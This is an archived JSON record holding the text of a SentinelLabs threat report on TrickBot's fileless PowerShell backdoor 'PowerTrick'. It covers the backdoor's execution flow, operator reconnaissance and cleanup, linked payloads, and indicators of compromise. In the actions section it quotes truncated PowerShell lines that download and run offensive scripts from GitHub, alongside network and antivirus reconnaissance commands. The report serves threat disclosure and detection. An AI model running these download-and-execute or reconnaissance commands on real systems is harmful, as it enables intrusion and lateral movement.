{
	"id": "e756145e-5fef-43f1-8de9-7ae8931902f5",
	"created_at": "2026-04-06T00:07:09.461967Z",
	"updated_at": "2026-04-10T03:20:00.564346Z",
	"deleted_at": null,
	"sha1_hash": "a3985225b9e6281d6ca31aaacef98f4be4e78080",
	"title": "Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3255011,
	"plain_text": "Top-Tier Russian Organized Cybercrime Group Unveils Fileless\r\nStealthy “PowerTrick” Backdoor for High-Value Targets -\r\nSentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2020-01-09 · Archived: 2026-04-05 16:16:28 UTC\r\nResearch by: Vitali Kremez, Joshua Platt and Jason Reaves\r\nRead the Full Report\r\nExecutive Summary\r\nThe TrickBot cybercrime enterprise actively develops many of its offensive tools such as “PowerTrick”\r\nthat are leveraged for stealthiness, persistence, and reconnaissance inside infected high-value targets such\r\nas financial institutions.\r\nMany of their offensive tools remain undetected for the most part as they are used for a short period of time\r\nfor targeted post-exploitation purposes such as lateral movement.\r\nTheir offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot\r\ncybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more\r\nopen source systems such as PowerShell Empire.\r\nThe end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to\r\nadapt to the new age of security controls and exploit the most protected and secure high-value networks.\r\nSentinelLabs developed mock command-and-control panels to allow the institutions to utilize them for\r\ntesting detections related to “PowerTrick”.\r\nBackground\r\nTrickBot is the successor of Dyre [1, 2] which at first was primarily focused on banking fraud in the same manner\r\nthat Dyre did utilize injection systems. TrickBot has shifted focus to enterprise environments over the years to\r\nincorporate many techniques from network profiling, mass data collection, incorporation of lateral traversal\r\nexploits. This focus shift is also prevalent in their incorporation of malware and techniques in their tertiary\r\ndeliveries that are targeting enterprise environments, it is similar to a company where the focus will shift\r\ndepending on what generates the best revenue. This research follows SentinelLabs discovery of the TrickBot\r\nAnchor malware and its nexus to the organized groups and advanced persistent threats.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 1 of 10\n\nGraph 1: Image of interactive human network exploitation operator within TrickBot enterprise\r\nPowerTrick Discovery\r\nSentinelLabs research into this PowerShell-based backdoor called “PowerTrick” traces back to the initial\r\ninfection, we assess with high confidence at least some of the initial PowerTrick infections are being kicked off as\r\na PowerShell task through normal TrickBot infections utilizing a repurposed backconnect module that can accept\r\ncommands to execute called “NewBCtest”.\r\nGraph 2: Image of PowerTrick execution flow\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 2 of 10\n\nAfter the initial stager for the “PowerTrick backdoor” is kicked off, then the actor issues the first command which\r\nis to download a larger backdoor. This process is similar to what you see in Powershell Empire with its stager\r\ncomponent.\r\nFigure 1: The malware operator issues the first command to download the backdoor.\r\nPowerTrick is designed to execute commands and return the results in Base64 format, the system uses a generated\r\nUUID based on computer information as a “botID.”\r\nFigure 2: A unique user ID (UUID) is generated for each bot\r\nThe Victim data is then posted back to the controller.\r\nFigure 3: The victim data is posted back to the backend.\r\nPowerTrick is simply designed to execute commands and return results.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 3 of 10\n\nFigure 4: Main functionality of PowerTrick\r\nPowerTrick: Actions on Objective\r\nAside from the PowerTrick backdoor, the criminal actors also commonly utilize other PowerShell utilities to do\r\nvarious tasks. A frequent one utilized was ‘letmein.ps1’ which is a Powershell stager for open-source exploitation\r\nframework Metasploit.\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerS\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/mas\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSp\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSp\r\nThe letmein script, in particular, is leveraged frequently to pivot the infection to another framework.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 4 of 10\n\nFigure 5: The\r\nactors download and execute letmein stager.\r\nIt is also used to detonate on other systems after pivoting.\r\nFigure 6: use of network drives to download and execute the letmein stager.\r\nThe frequently used commands and actions are as follows:\r\nnet view\r\nnet use\r\nping systems\r\nnet use with usernames to check permissions on systems\r\nWMIC /node:localhost /Namespace:rootSecurityCenter2 Path AntiVirusProduct Get displayName\r\n/Format:List\r\nOnce the system and network have been profiled, the actors perform deletion operation and cleanup. They remove\r\nany existing files that did not execute properly and move on to a different target of choice or perform lateral\r\nmovement inside the environment to high-value systems such as financial gateways. The executed tasks included\r\na wide range of utilities such as previously shown Metasploit. Other interesting deliveries will be discussed below:\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 5 of 10\n\nGraph 3: Summary of PowerTrick Connections to Known Malware\r\nI. TrickBot Anchor Malware\r\nTrickBot Anchor DNS variant [3] is frequently leveraged as an attack framework for enterprise environments.\r\nII. TerraLoader, “more_eggs” Backdoor\r\nTerraLoader variant version “6.0” with more_eggs JavaScript backdoor onboard is a deployed payload, often in\r\naddition to the aforementioned Anchor DNS variant on the same systems.\r\nFigure 7: The decoded “more_eggs” backdoor from TerraLoader.\r\nIII. Direct Shellcode\r\nDirect shellcode execution is a methodology for payload deployment via a hexlified parameter.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 6 of 10\n\nFigure 8: The command is designed to process shellcode as a parameter.\r\nThis is something we have observed frequently where the actors will modify or create new delivery systems in\r\norder to bypass restrictions and security controls.\r\nAttacker View: How PowerTrick Drops TrickBot Anchor Bot\r\nI. Launch PowerShell\r\nThe PowerTrick session is initialized with the following command:\r\nAfter PowerTrick is successfully executed, a child PowerShell process is created and the attacker issues a series of\r\ncommands in an effort to choose an existing directory on the system.\r\nII. dir command is executed to check the filesystem\r\nIII. Execute PowerShell script to download anchor DNS\r\nIV. After the script is executed, the “dir” command is issued again to verify the download was successful.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 7 of 10\n\nV. After verifying the download, the file is executed and the scheduled tasks are checked.\r\nVI. The directory is checked again to verify the file successfully self-deleted.\r\nVII. In this particular case, a second PowerShell task is executed via PowerTrick. This file is the more_eggs\r\nbackdoor described above.\r\nVIII. Once again the directory is checked to verify the download was successful. In each case the existing\r\nfolder name is used for the file.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 8 of 10\n\nIX. After download verification, the file is executed\r\nX. The directory is again checked to verify the file was run and self-deleted.\r\nXI. The following PowerShell command is executed to check for the presence of anti-virus products\r\nXII. Processes checked\r\nXIII. Session is killed\r\nAnalyst Note:\r\nThe PowerShell task parent window name was OleMainThreadWndName, while the child had the normal name\r\nC:windowsSystem32WindowsPowerShellv1.0powershell.exe .\r\nIndicators of Compromise\r\nAnchor (SHA-256): 254e7a333ecee6d486b4f8892fe292fb7ba1471fe500651c1ba3e7ff5c9e03c8\r\nTerraLoader (SHA-256): dcf714bfc35071af9fa04c4329c94e385472388f9715f2da7496b415f1a5aa03\r\nkostunivo[.]com\r\ndrive.staticcontent[.]kz\r\nweb000aaa[.]info\r\nwizardmagik[.]best\r\ntraveldials[.]com\r\nnorthtracing[.]net\r\nmagichere[.]icu\r\nmagikorigin[.]me\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 9 of 10\n\n5[.]9.161.246\r\n192[.]99.38.41\r\n172[.]82.152.15\r\n193[.]42.110.176\r\nIOCs on GitHub\r\nReferences\r\n1: https://www.malwarebytes.com/blog/news/2016/10/trick-bot-dyrezas-successor\r\n2: https://www.fidelissecurity.com/threatgeek/archive/trickbot-we-missed-you-dyre/\r\n3: https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns\r\nRead the Full Report\r\nSource: https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value\r\n-targets/\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/"
	],
	"report_names": [
		"top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets"
	],
	"threat_actors": [],
	"ts_created_at": 1775434029,
	"ts_updated_at": 1775791200,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.pdf",
		"text": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.txt",
		"img": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.jpg"
	}
}